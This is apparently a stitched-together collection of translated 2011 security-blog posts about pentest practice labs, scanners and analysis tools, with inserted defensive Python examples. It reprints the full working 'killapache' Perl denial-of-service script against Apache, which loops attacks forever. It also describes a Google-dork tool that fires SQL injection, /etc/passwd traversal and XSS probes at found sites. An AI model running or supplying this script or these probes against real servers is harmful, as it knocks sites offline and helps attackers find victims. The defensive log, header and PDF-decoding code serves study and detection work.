This should be a good resource for students who are studying the subject.

May 10th, 2011

It's very difficult for a beginner security analyst, especially one interested in pentesting, to find good pentesting study resources. Since pentesting itself has many sub-areas of study, it becomes even harder to choose, and then to find, a suitable application to practise on.

Because a beginner knows almost nothing, preparing a home pentesting lab for study is very difficult: the beginner would first have to know something about coding a vulnerable application before being able to exploit it.

With that in mind, I decided to gather the most complete list I could of all the vulnerable pentesting applications I could find. They are categorized by the type of application: Web Pentesting, War Games and Insecure Distributions. Because of the number of tools I won't be doing any previews, as that would delay this post a lot and make it a little boring to read. I will review every tool with complete labs in future posts.

As I don't know every pentesting tool on the planet, feel free to contact me if you know of another application; I would much appreciate it. I apologize if I have miscategorized some of them; feel free to tell me so I can correct it.

Note that this post only covers vulnerable applications that are meant to be exploited, not the tools used to exploit them.

 

Web Pentesting

Application Name | Company/Developer | URL
OWASP WebGoat | OWASP | http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP Vicnum | OWASP | http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project
OWASP InsecureWebApp | OWASP | http://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project
Web Security DOJO | Maven Security Consulting | http://www.mavensecurity.com/web_security_dojo/
Gruyere (formerly Codelab / Jarlsberg) | Google | http://google-gruyere.appspot.com/
Hacme Game | NTNU | http://hacmegame.org/
SPI Dynamics | SPI Dynamics | http://zero.webappsecurity.com/
Acunetix 1 | Acunetix | http://testphp.vulnweb.com/
Acunetix 2 | Acunetix | http://testasp.vulnweb.com/
Acunetix 3 | Acunetix | http://testaspnet.vulnweb.com/
PCTechtips Challenge | PC Tech Tips | http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
Damn Vulnerable Web Application | DVWA | http://dvwa.co.uk/
Mutillidae | Iron Geek | http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
The Butterfly Security Project | The Butterfly Security | http://sourceforge.net/projects/thebutterflytmp/
Hacme Casino | McAfee | http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Hacme Bank 2.0 | McAfee | http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx
Updated HacmeBank | McAfee | http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
Hacme Books | McAfee | http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Hacme Travel | McAfee | http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
Hacme Shipping | McAfee | http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Moth | Bonsai Sec | http://www.bonsai-sec.com/en/research/moth.php
Stanford SecuriBench | Stanford | http://suif.stanford.edu/%7Elivshits/securibench/
SecuriBench Micro | Stanford | http://suif.stanford.edu/%7Elivshits/work/securibench-micro/
BadStore | BadStore | http://www.badstore.net/
WebMaven/Buggy Bank | Maven Security | http://www.mavensecurity.com/webmaven
EnigmaGroup | Enigma Group | http://enigmagroup.org/
XSS Encoding Skills – x5s (Casaba Watcher) | X5S | http://www.nottrusted.com/x5s/
Exploit-DB | Exploit DB | http://www.exploit-db.com/webapps
The Bodgeit Store | The Bodgeit Store | http://code.google.com/p/bodgeit/
LampSecurity | MadIrish | http://sourceforge.net/projects/lampsecurity/
hackxor | Hackxor | http://hackxor.sourceforge.net/cgi-bin/index.pl
WackoPicko | WackoPicko | https://github.com/adamdoupe/WackoPicko
RSnake's Vulnerability Lab | RSnake | http://ha.ckers.org/weird/

 

War Games

Application Name | Company / Developer | URL
Hell Bound Hackers | Hell Bound Hackers | http://hellboundhackers.org/
Vulnerability Assessment | Kevin Orrey | http://www.vulnerabilityassessment.co.uk/
Smash the Stack | Smash the Stack | http://www.smashthestack.org/
Over the Wire | Over the Wire | http://www.overthewire.org/wargames/
Hack This Site | Hack This Site | http://www.hackthissite.org/
Hacking Lab | Hacking Lab | https://www.hacking-lab.com/
We Chall | We Chall | https://www.wechall.net/
REMnux | REMnux | http://zeltser.com/remnux/

 

Insecure Distributions

Application Name | Company / Developer | URL
Damn Vulnerable Linux | DVL | http://www.damnvulnerablelinux.org/
Metasploitable | Offensive Security | http://blog.metasploit.com/2010/05/introducing-metasploitable.html
de-ICE | Hacker Junkie | http://www.de-ice.net/
Moth | Bonsai Security Software | http://www.bonsai-sec.com/en/research/moth.php
PwnOS | Neil Dickson | http://www.neildickson.com/os/
Holynix | Pynstrom | http://pynstrom.net/holynix.php

 

Have fun !!!

[Source] http://www.felipemartins.info/2011/05/pentesting-vulnerable-study-frameworks-complete-list/

Posted by bitfox

"Samurai" is a Linux-based website assessment and testing toolkit packaged as a framework of open-source and freeware tools. Overshadowed by BackTrack, it is not widely known, but it contains only the tools an assessor actually needs.

Samurai Web Testing Framework (WTF) is an excellent Linux-based LiveCD distribution created by Kevin Johnson of Secure Ideas and Justin Searle of InGuardians to include what they believe are the best of the open source and free tools that focus on testing and attacking websites, selections based on the tools they use as part of their job duties. As part of the Samurai collective there is also the Samurai WTF Firefox add-ons collection, which includes web application penetration testing and security analysis add-ons for your Firefox browser.

<Base system>


<Various assessment tools>


Download : http://sourceforge.net/projects/samurai/

[Notice: the user alone is responsible for any malicious use.]

An attack tool that uses Google search. Is your own site safe?

[Source] http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/


 


XCode SQLI/LFI/XSS Vulnurable & webshell Scanner

After downloading, extract all the files and run XCodeXploitScanner.exe. Click Dork It and the tool will collect links for the dork you entered and then display the list. Once the list is displayed, you can scan the sites on the list for SQL injection / Local File Inclusion / Cross Site Scripting vulnerabilities. The tool sends injection parameters to the site such as ‘ – * /../../../../../../../../../../../../../../etc/passwd%00 , >alert(XXS DETECTED XCode Exploit Scanner). If the site has the bug, the status will show: www.target.com?blabla.php?=1234 : SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd%00 LFI Vulnerable
www.target.com?blabla.php?=1234
>alert(XXS DETECTED XCode Exploit Scanner) XSS Vulnerable

For entries whose status shows a detection, you can click Open Vuln Link with Browser to display the site in your browser.

The tool also adds a webshell hunter, where you can search for c99, r57, c100, ITsecteam_shell and b374k web shells that have been uploaded by hackers.

There are probably still many shortcomings or bugs the author is not aware of. But at least this tool can make it easier for you to find targets.

Hope it is useful.
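The following is an added example written from the defender's side; it is not part of the post and not code from the XCode scanner. It takes a few constructed Apache access-log lines whose request targets have the same shapes as the probes described above (a bare quote, a /../ traversal ending in %00, an injected alert(), and a request for a c99.php shell), tags each line with the probe family it resembles, and then lists the source addresses that touched several families, which is what a scanner run looks like in a server log. The log lines, the IP addresses, the tag names and the family threshold are all my own constructions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format). The query
# strings copy the probe shapes the post above attributes to the scanner.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jan/2011:10:00:01 +0700] "GET /blabla.php?id=1234 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Jan/2011:10:00:02 +0700] "GET /blabla.php?id=1234' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Jan/2011:10:00:03 +0700] "GET /blabla.php?id=1234/../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Jan/2011:10:00:04 +0700] "GET /blabla.php?id=1234%3Ealert(XXS%20DETECTED) HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Jan/2011:10:00:05 +0700] "GET /uploads/c99.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Jan/2011:10:01:00 +0700] "GET /blabla.php?id=99 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Shell names the post lists for the "webshell hunter" feature
WEBSHELL_NAMES = {"c99", "r57", "c100", "itsecteam_shell", "b374k"}


def classify_target(target):
    """Tag one request target with the probe families it resembles."""
    decoded = unquote(target)
    path, _, query = decoded.partition("?")
    lowered = query.lower()
    tags = set()
    if "'" in query:                                  # bare quote probe
        tags.add("sqli")
    if "../" in query or "/etc/passwd" in lowered or "\x00" in query:
        tags.add("lfi")                               # traversal / null byte
    if "alert(" in lowered or "<script" in lowered:
        tags.add("xss")
    basename = path.rsplit("/", 1)[-1].rsplit(".", 1)[0].lower()
    if basename in WEBSHELL_NAMES:                    # request for a known shell name
        tags.add("webshell")
    return tags


def scan_log(text):
    """One record per log line that matches at least one probe family."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_target(m.group("target"))
        if tags:
            hits.append({"line": lineno, "ip": m.group("ip"),
                         "status": int(m.group("status")), "tags": sorted(tags)})
    return hits


def probing_sources(text, threshold=3):
    """Addresses that touched at least `threshold` distinct probe families:
    one stray quote may be a typo, three families in a row is a scanner."""
    families = {}
    for hit in scan_log(text):
        families.setdefault(hit["ip"], set()).update(hit["tags"])
    return sorted(ip for ip, fams in families.items() if len(fams) >= threshold)


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("scanner sources:", probing_sources(SAMPLE_LOG))
```

The per-line tags are deliberately coarse; the useful signal is the second function, which groups by source address, because a scanner of this kind fires every family at every link it collected, while a real user almost never sends more than one of them.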

Screen Shot

LFI Vulnerable

Web Shell Hunter

Usage video



================================================================
Credits:

Code name : .::XCode Exploit Vulnurable & webshell Scanner::.
Description :
SQLI/LFI/XSS/Webshell Hunter with Google Engine -
Compiler : Microsoft Visual Basic 6.0
Author : poni
System : Windows 95, 98, XP, Vista, 7
Size : 718 kb
Update : I'm not sure where I will put it. Just
check the sites below

http://www.xcode.or.id

http://ferdianelli.wordpress.com

================================================================
Info :
XCode Exploit
Vulnurable & webshell Scanner helps you to
gather the dork links from Google. Then you may check whether the
results are vulnerable to exploitation with SQL injection commands,
LFI and XSS. And you may hunt the webshells that were uploaded.
=================================================================

EOF

 

[Notice: the user alone is responsible for any malicious use.]

Killapache: DDOS tool - Half of the Internet is vulnerable now !

The Apache Software Foundation has announced a denial-of-service vulnerability that affects all versions of the ubiquitous Apache web server, leaving up to 65% of all websites vulnerable. A previously unknown flaw in the code that processes byte-range headers allows version 2.2.x of the Apache web server to be crippled from a single PC. An “Apache Killer” Perl script impressively demonstrates the problem.

How does the killapache DDOS tool work?
killapache sends GET requests with multiple “byte ranges” that claim large portions of the system's memory. A “byte range” statement lets a browser load only certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files: download clients use it to resume downloads that have been interrupted, and it is designed to reduce bandwidth requirements. However, specifying many unsorted components in the header can cause an Apache server to malfunction.


No patch has yet been released for this vulnerability in Apache, but a few workarounds have been found. These have been posted by The Apache Software Foundation and can be used until a stable fix is released. The vulnerability exploits a feature of web servers that lets you pause and resume downloads: these days, if you have to stop a download part-way through, you can generally pick up where you left off instead of starting again from scratch.
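The following is an added example, not part of the article and not part of the Kingcope script below: it shows the check a defender would put in front of the server while waiting for a fix. It parses the Range header, rejects requests that carry more than a handful of ranges (the workaround the Apache project published at the time used a limit of five ranges; the limit here is an assumption you should tune) or ranges that are unsorted or overlapping, and it is exercised against a normal resume request and against the 1301-range header of the shape the script builds. Function names and sample headers are my own.

```python
import re

# Constructed sample headers: a normal resume request, and the shape of the
# header the killapache script builds (bytes=0-,5-0,5-1,...,5-1299).
NORMAL_RANGE = "bytes=500-1000"
ATTACK_RANGE = "bytes=0-" + "".join(f",5-{k}" for k in range(1300))

# One byte-range-spec: "first-last", "first-" or "-suffix" (RFC 2616 14.35.1)
RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def parse_byte_ranges(header):
    """Split a Range header value into (first, last) tuples.

    None stands for an open end ("500-" or "-500"). Returns None when the
    value is not a syntactically valid bytes range.
    """
    if not header.lower().startswith("bytes="):
        return None
    ranges = []
    for spec in header[len("bytes="):].split(","):
        m = RANGE_SPEC.match(spec)
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else None
        ranges.append((first, last))
    return ranges


def range_header_verdict(header, max_ranges=5):
    """Decide whether to honour a Range header; returns (accept, reason).

    max_ranges=5 is an assumption taken from the Apache workaround; tune it
    to your traffic. A rejected request can simply be served in full (header
    ignored) or refused; the point is that the server never expands hundreds
    of ranges into separate buckets in memory.
    """
    ranges = parse_byte_ranges(header)
    if ranges is None:
        return False, "malformed Range header"
    if len(ranges) > max_ranges:
        return False, f"{len(ranges)} ranges exceeds limit of {max_ranges}"
    # A legitimate resume request asks for ascending, non-overlapping pieces.
    prev_end = -1
    for first, last in ranges:
        if first is None:            # suffix range "-N": position unknown, skip
            continue
        if first <= prev_end:
            return False, "unsorted or overlapping ranges"
        prev_end = last if last is not None else float("inf")
    return True, "ok"


if __name__ == "__main__":
    for h in (NORMAL_RANGE, ATTACK_RANGE):
        ok, why = range_header_verdict(h)
        print(f"{h[:40]!r:45} -> {'accept' if ok else 'reject'} ({why})")
```

The count check alone is what stops the script above; the ordering check catches the smaller variants that stay under the count limit but still ask the server to assemble overlapping pieces, which a download client never does.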


Source
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
 print "Apache Remote Denial of Service (memory exhaustion)\n";
 print "by Kingcope\n";
 print "usage: perl killapache.pl <host> [numforks]\n";
 print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
 
$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
 $p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;  
 
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                         Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                         Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
 print "host seems vuln\n";
 return 1; 
} else {
 return 0; 
}
}

if ($#ARGV < 0) {
 usage;
 exit; 
}

if ($#ARGV > 1) {
 $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
 print "Host does not seem vulnerable\n";
 exit; 
}
while(1) {
killapache();
}

This can cause system outages. Please use it for learning purposes only.
Malicious use is explicitly the user's own responsibility.



[Source] http://www.thehackernews.com/2011/08/killapache-ddos-tool-half-of-internet.html

"inSSIDer" is a powerful AP discovery tool that visually shows wireless traffic and signal strength.
It lets you choose between 2.4 GHz and 5 GHz, and its excellent discovery capability makes it
a tool I rely on for wireless LAN vulnerability checks.

The APs around my home.. not many..^^; (Fortunately, none using WEP keys are visible.)


For small and medium-sized businesses, please use it to verify the APs your company manages
and to detect rogue APs.
 



A tool that analyzes whether a PDF contains malicious code.
Details are below. :D

 


-----------------------------------------------------------------

This is a free tool for the analysis of malicious PDF documents. It also has some features that can make it useful for PDF vulnerability development.

It has specialized tools for dealing with obfuscated JavaScript, low-level PDF headers and objects, and shellcode. For shellcode analysis, it has an integrated interface for libemu sctest, an updated build of iDefense sclog, and a shellcode_2_exe feature.

JavaScript tools include integration with JS Beautifier for code formatting, the ability to run portions of the script live for deobfuscation, toolbox classes that handle extra canned functionality, and a fairly stable refactoring engine that parses a script and replaces all the random function and variable names with logical sanitized versions for readability.

The tool also supports unescaping/formatting of manipulated PDF headers, and can decode filter chains (multiple filters applied to the same stream object).

Download: PDF Stream Dumper Setup 0.9.259 (includes full vb6 source)

Note: I have removed the sample shellcodes because they were giving people AV warnings.

Training videos for PDFStreamDumper:

If you are looking for malicious PDF samples to analyze, make sure to check out the Contagio and jsunpack sites.

International users: This new build should now work on systems with extended character set languages set as their default language. If you encounter errors please let me know.

Full feature list
  • supported filters: FlateDecode, RunLengthDecode, ASCIIHEXDecode, ASCII85Decode, LZWDecode
  • Integrated shellcode tools:
    • sclog gui (Shellcode Analysis tool I wrote at iDefense)
    • scdbg libemu based Shellcode analysis tool
    • Shellcode_2_Exe functionality
    • Export unescaped bytes to file
  • supports filter chaining (i.e. multiple filters applied to the same stream)
  • supports unescaping encoded pdf headers
  • scriptable interface to process multiple files and generate reports
  • view all pdf objects
  • view deflated streams
  • view stream details such as file offsets, header, etc
  • save raw and deflated data
  • search streams for strings
  • scan for functions which contain pdf exploits (dumb scan)
  • format javascript using js beautifier (see credits in readme)
  • view streams as hex dumps
  • zlib compress/decompress arbitrary files
  • replace/update pdf streams with your own data
  • basic javascript interface so you can run parts of embedded scripts
  • PdfDecryptor w/source - uses iTextSharp and requires .Net Framework 2.0
  • Basic JavaScript de-obfuscator
  • can hide: header only streams, duplicate streams, selected streams
  • js ui also has access to a toolbox class to
    • simplify fragmented strings
    • read/write files
    • do hexdumps
    • do unicode safe unescapes
    • disassembler engine
    • replicate some common Adobe API (new)
Current Automation scripts include:
  • csv_stats.vbs - Builds csv file with results from lower status bar for all files in a directory
  • pdfbox_extract.vbs - use pdfbox to extract all images and text from current file
  • string_scan.vbs - scan all decompressed streams in all files in a directory for a string you enter
  • unsupported_filters.vbs - scan a directory and build list of all pdfs which have unsupported filters
  • filter_chains.vbs - recursively scans parent dir for pdfs that use multiple encoding filters on a stream.
  • obsfuscated_headers.vbs - recursively scans parent dir for pdfs that have obfuscated object headers
  • pdfbox_extract_text_page_by_page.vbs - uses pdfbox to extract page data into individual files

Current Plugins include:
  • Build_DB.dll - Search and sort data inside multiple samples, move and organize files
  • obj_browser.dll - view layout and data inside pdf in text form
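The following is an added example, not code from PDFStreamDumper; it shows concretely what the filter-chaining feature described above has to do. It reads the /Filter entry of a stream dictionary and applies the filters in the order the PDF names them (the first-named filter is applied first when decoding, because it was applied last when encoding), with standard-library implementations of four of the five filters in the list above. LZWDecode is deliberately left out and reported as unsupported, which is the same distinction the unsupported_filters.vbs script draws. The sample stream, a short JavaScript string compressed with zlib and then hex-encoded, and the function names are my own constructions.

```python
import base64
import binascii
import re
import zlib


def ascii_hex_decode(data):
    """ASCIIHexDecode: hex digit pairs, whitespace ignored, '>' is EOD,
    an odd trailing digit is treated as if followed by '0'."""
    text = re.sub(rb"\s+", b"", data.split(b">", 1)[0])
    if len(text) % 2:
        text += b"0"
    return binascii.unhexlify(text)


def ascii85_decode(data):
    """ASCII85Decode: optional '<~' prefix, '~>' is EOD, whitespace ignored."""
    body = data.split(b"~>", 1)[0]
    if body.startswith(b"<~"):
        body = body[2:]
    return base64.a85decode(re.sub(rb"\s+", b"", body))


def run_length_decode(data):
    """RunLengthDecode: length byte L; L < 128 copies the next L+1 bytes
    literally, L > 128 repeats the next byte 257-L times, 128 is EOD."""
    out = bytearray()
    i = 0
    while i < len(data):
        length = data[i]
        i += 1
        if length == 128:
            break
        if length < 128:
            out += data[i:i + length + 1]
            i += length + 1
        else:
            out += bytes([data[i]]) * (257 - length)
            i += 1
    return bytes(out)


# Decoders keyed by filter name. LZWDecode is left out on purpose so that a
# stream using it is reported rather than silently mis-decoded.
DECODERS = {
    b"/FlateDecode": zlib.decompress,
    b"/ASCIIHexDecode": ascii_hex_decode,
    b"/ASCII85Decode": ascii85_decode,
    b"/RunLengthDecode": run_length_decode,
}


def filter_chain(stream_dict):
    """Return the filter names from a stream dictionary, in the order the
    PDF names them (a single name or an array of names)."""
    m = re.search(rb"/Filter\s*(\[[^\]]*\]|/\w+)", stream_dict)
    return re.findall(rb"/\w+", m.group(1)) if m else []


def unsupported_filters(stream_dict):
    """Names in the chain that this decoder cannot handle."""
    return [f for f in filter_chain(stream_dict) if f not in DECODERS]


def decode_stream(stream_dict, raw):
    """Apply the chain: the first-named filter is the first one applied when
    decoding, because it was the last one applied when encoding."""
    missing = unsupported_filters(stream_dict)
    if missing:
        raise ValueError("unsupported filter(s): " + b" ".join(missing).decode())
    data = raw
    for name in filter_chain(stream_dict):
        data = DECODERS[name](data)
    return data


# Constructed sample: a short script compressed with zlib and then hex-encoded,
# which is exactly what "/Filter [/ASCIIHexDecode /FlateDecode]" describes.
SAMPLE_PLAINTEXT = b"app.alert('constructed sample script');"
SAMPLE_RAW = binascii.hexlify(zlib.compress(SAMPLE_PLAINTEXT)).upper() + b">"
SAMPLE_DICT = (b"<< /Filter [/ASCIIHexDecode /FlateDecode] /Length %d >>"
               % len(SAMPLE_RAW))

if __name__ == "__main__":
    print(filter_chain(SAMPLE_DICT))
    print(decode_stream(SAMPLE_DICT, SAMPLE_RAW))
```

When triaging a sample, the order matters: inflating first and hex-decoding second on the stream above fails with a zlib error, which is why a "dumb" string scan of raw stream bytes misses scripts hidden behind even one extra layer of encoding.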


 

[Source] http://sandsprite.com/blogs/index.php?uid=7&pid=57
'Spell' is a word that means 'incantation'.
It is a neat program by 개꿈 (Gaekkum), who is well known for "Click to Tweak".
I'm surely not the only one who suffered for a while when NaXver blocked right-click copying.
The view-source function is an important element of security. Of course you can also see it through packets.. but that gets quite tedious. Hmm.
How does one even build this.. it reminds me of when I worked (briefly?) as a programmer, and makes me curious. ^^;

Usage is easy too. Install it and click around; you'll get it right away.



But then, how would you block something like this.. +ㅁ+;

For reference, it is freeware.

[Source] http://www.rodream.net/



Usage is super simple and needs no explanation~ haha


Many administrators find it hard to get a grip on their company's IT asset inventory. You may not be able to know exactly how many servers you manage or what the equipment is, but there is an all-round scanner that is useful as a supporting tool...


Of course, it is efficient when there are fewer than about 100 machines. -0-;;

Where I use it is, as expected, in pentests. Not only the security manager but the assessor too is curious about your system layout.

Here I briefly show with screenshots how services are running on my PC and on my blog, and move on.
Using it at the right time and in the right place is what matters.


[DNS status of my blog]


[IP status and system of my PC]

 

[Open ports and running services]

This tool was released purely for operations and is well known among network administrators.
How will you use it? .... For me, of course, it's security!

[Detailed product description..]
http://www.solarwinds.com/
I have used many tools while doing pentests.

An automated scanner is a tool that finds and verifies the things the assessor missed during a pentest; it must never be trusted blindly.

Just as a doctor doesn't reach a conclusion from an X-ray alone..;

Personally, the most reliable one is, as expected, the expensive

IBM Rational AppScan

But I don't use it.. -ㅅ-; No money ㅜㅜ

I use some of the free tools, such as
Netsparker
http://www.mavitunasecurity.com/netsparker/

 



or the cute SandCat
http://www.syhunt.com/?n=Sandcat.Sandcat


But.. I haven't used a scanning tool in the past year.. -ㅅ-; all manual and exhaustive assessments..
Customers, you're mean~ GG